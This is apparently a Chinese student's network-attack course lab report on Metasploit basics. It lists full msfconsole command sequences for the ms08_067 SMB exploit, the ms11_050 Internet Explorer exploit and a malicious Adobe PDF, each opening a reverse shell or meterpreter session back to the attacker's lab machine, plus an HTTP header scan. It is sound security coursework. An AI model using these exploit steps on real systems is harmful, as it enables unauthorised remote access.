2018-2019 20165208 网络对抗 Exp5 MSF基础

目录

2018-2019 20165208 网络对抗 Exp5 MSF基础

实验内容

本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路。具体需要完成:

1.1一个主动攻击实践,如ms08_067; (1分)

1.2 一个针对浏览器的攻击,如ms11_050;(1分)

1.3 一个针对客户端的攻击,如Adobe;(1分)

1.4 成功应用任何一个辅助模块。(0.5分)

1.5 报告评分(1分)

基础问题回答

用自己的话解释什么是exploit,payload,encode.

  • exploit:指由攻击者利用安全漏洞,将负责攻击的代码payload传送到靶机中。
  • payload:是target在被渗透攻击之后去执行的恶意代码,如ex1的shellcode。
  • encode:进行编码改变payload形态,使其不出现特定字符。

实践过程记录

1.一个主动攻击实践,如ms08_067;

 ①攻击机:kali IP:192.168.119.128
 
②靶机:windows XP SP3(English) IP:192.168.119.129(失败)

②靶机:windows 2000 Professional(English) IP:192.168.119.130(成功)
  • 在攻击机kali输入msfconsole进入控制台,依次输入以下指令:
    • msf > use exploit/windows/smb/ms08_067_netapi//使用ms08_067漏洞,use后其实是漏洞所在目录路径名
    • msf exploit(ms08_067_netapi) > show payloads//显示回连攻击载荷
    • msf exploit(ms08_067_netapi) > set payload
    • generic/shell_reverse_tcp //tcp反向回连
    • msf exploit(ms08_067_netapi) > set LHOST 192.168.119.128 //攻击机ip
    • msf exploit(ms08_067_netapi) > set LPORT 5208 //攻击端口
    • msf exploit(ms08_067_netapi) > set RHOST 192.168.119.129 //靶机ip,特定漏洞端口已经固定
    • msf exploit(ms08_067_netapi) > set target 0 //自动选择目标系统类型,匹配度较高
    • msf exploit(ms08_067_netapi) > exploit //攻击
  • 建立会话,攻击失败显示如下:
    2018-2019 20165208 网络对抗 Exp5 MSF基础

  • 通过网上查找资料,发现可能是打过补丁的原因,更换虚拟机。
  • 选择靶机windows 2000 Professional(English)。
  • 按上述命令进行操作,记得更换IP。
    2018-2019 20165208 网络对抗 Exp5 MSF基础

  • 显示监听成功,dir命令成功。
    2018-2019 20165208 网络对抗 Exp5 MSF基础

2. 一个针对浏览器的攻击,如ms11_050;

①攻击机:kali IP:192.168.119.128

②靶机:windows 7 x64 IP:192.168.119.131 IE:8.0(失败)

②靶机:windows Sever 2008  IP:192.168.119.132(成功)
  • 在攻击机kali输入msfconsole进入控制台,依次输入以下指令:

    • msf > use windows/browser/ms11_050_mshtml_cobjectelement//使用浏览器ms11_050漏洞
    • msf exploit(ms11_050_cobjectelement) > set payload windows/meterpreter/reverse_http //http反向回连
    • msf exploit(ms11_050_cobjectelement) > set LHOST 192.168.119.128 //攻击机ip
    • msf exploit(ms11_050_cobjectelement) > set LPORT 5208 //攻击端口固定
    • msf exploit(ms11_050_cobjectelement) > set URIPATH 5208ky //统一资源标识符路径设置
    • msf exploit(ms11_050_cobjectelement) > exploit
  • 运行靶机浏览器,这时win7出现DNS服务器未响应,尝试解决无果后,更换了虚拟机。
    2018-2019 20165208 网络对抗 Exp5 MSF基础

  • 操作同上
    2018-2019 20165208 网络对抗 Exp5 MSF基础

  • 在访问http://192.168.119.128:8080/5208ky时,可见攻击机出现访问信息。
    2018-2019 20165208 网络对抗 Exp5 MSF基础
    2018-2019 20165208 网络对抗 Exp5 MSF基础

3. 一个针对客户端的攻击,如Adobe;

①攻击机:kali IP:192.168.119.128

②靶机:windows XP sp2 IP:192.168.119.133 

Adobe:9.3
  • 在攻击机kali输入msfconsole进入控制台,依次输入以下指令:

    • `msf > use windows/fileformat/adobe_cooltype_sing
    • msf exploit(adobe_cooltype_sing) > set payload windows/meterpreter/reverse_tcp` //tcp反向回连
    • msf exploit(adobe_cooltype_sing) > set LHOST 192.168.119.128 //攻击机ip
    • msf exploit(adobe_cooltype_sing) > set LPORT 5208 //攻击端口
    • msf exploit(adobe_cooltype_sing) > set FILENAME 20165208.pdf //设置生成pdf文件的名字
    • msf exploit(adobe_cooltype_sing) > exploit //攻击
  • 成功生成20165208.pdf。
    2018-2019 20165208 网络对抗 Exp5 MSF基础

  • 将pdf文件传送或拷贝到靶机上后,在kali上输入back退出当前模块,进入监听模块,输入以下命令:

    • msf > use exploit/multi/handler //进入监听模块
    • msf exploit(handler) > set payload windows/meterpreter/reverse_tcp //tcp反向连接
    • msf exploit(handler) > set LHOST 192.168.119.128 //攻击机ip
    • msf exploit(handler) > set LPORT 5208 //攻击端口固定
    • msf exploit(handler) > exploit
  • 然后在靶机上打开20165208.pdf文件。
    2018-2019 20165208 网络对抗 Exp5 MSF基础

  • kali连接成功。
    2018-2019 20165208 网络对抗 Exp5 MSF基础

  • 攻击机运行ipconfig命令,可显示靶机IP地址。
    2018-2019 20165208 网络对抗 Exp5 MSF基础

  • 靶机关闭pdf文件,则失去权限。
    2018-2019 20165208 网络对抗 Exp5 MSF基础

4. 成功应用任何一个辅助模块(scanner/http/http_header 唯一)

  • 使用命令msf > show auxiliary查看所有的辅助模块
    2018-2019 20165208 网络对抗 Exp5 MSF基础

  • 在看的时候我试了几个,因为好多命令的描述我不能准确的定位到它功能,最后我选择了scanner/http/http_header
  • info scanner/http/http_header查看命令相关信息。
    2018-2019 20165208 网络对抗 Exp5 MSF基础

  • 我们可以看到它的描述: This module shows HTTP Headers returned by the scanned systems。我最初以为它是给我返回浏览器的头部信息,也就是可以监听对方访问网页浏览的是什么。
  • 实际操作:首先use scanner/http/http_header调用模块,然后根据info得出的参数信息对参数进行设定

use scanner/http/http_header
set RHOSTS 192.168.119.132
RHOSTS => 192.168.119.132
set HTTP_METHOD GET
set RPORT 8080
exploit

set RPORT 80
exploit

2018-2019 20165208 网络对抗 Exp5 MSF基础

  • 在端口80监听时我们可以看到返回信息Microsoft-IIS/7.0
  • 可以得出结论:目标计算机80端口上运行着IIS 7.0,

而在历年的IIS版本漏洞中,IIS 6.0、IIS 5.1、IIS 7.5和IIS 7.0受影响的漏洞数居前四位。同时我们可以大概根据IIS 7.0 判断出它的操作系统版本为Win 200或Vista全系列 。这和我们的靶机系统也是匹配的。

IIS版本 系统版本 受影响漏洞数量
IIS 5.0 Windows 2000 10
IIS 5.1 Windows XP 系列 16
IIS 7.0 Win 2008、Vista全系列 11
IIS 10.0 Win 10和Win 2016 2

实验中遇到的问题及解决方法

1.问题:在主动攻击实践时,操作完exploit后显示 Exploit completed, but no session was created.
2018-2019 20165208 网络对抗 Exp5 MSF基础

查了资料后我做了以下几个修改尝试:

我最初设的target参数是0,即自动选择目标系统类型。在尝试解决时我选了设为6。想说会不会这样的匹配度更合适,失败了。
2018-2019 20165208 网络对抗 Exp5 MSF基础
2018-2019 20165208 网络对抗 Exp5 MSF基础

后来找到过程中看到有说可能是系统打了补丁,使攻击难以进行。所以就选择更换了虚拟机。
2018-2019 20165208 网络对抗 Exp5 MSF基础
2018-2019 20165208 网络对抗 Exp5 MSF基础

2.问题:在进行针对浏览器的攻击时,靶机显示无法显示该网页。进行诊断后提示是DNS服务器未响应。
2018-2019 20165208 网络对抗 Exp5 MSF基础

根据网络诊断提示DNS服务器未响应,我进行了三种尝试,分别如下:
2018-2019 20165208 网络对抗 Exp5 MSF基础
2018-2019 20165208 网络对抗 Exp5 MSF基础
2018-2019 20165208 网络对抗 Exp5 MSF基础

不过,so sad,失败了,最后选择更换为win 2008虚拟机。

实验感想

本次实验对MSF做了简单的试操作,在找到合适的虚拟机后实验还是相对清晰、简单的。在这个过程中,学会查找很主要,infoshow targetsshow payloads等命令都帮了我不少忙。在整个实验中第四个模块是我独立完成的,网络上有关我选的这个命令的直接使用教程还是蛮少的,但是可以发现很多其他的例子。举一反三,怀着未知的忐忑去尝试成功后还是蛮有成就感的。

上一篇:MobaXterm客户端连接Linux操作系统


下一篇:mobaxterm打开ubuntu桌面(转载,未尝试)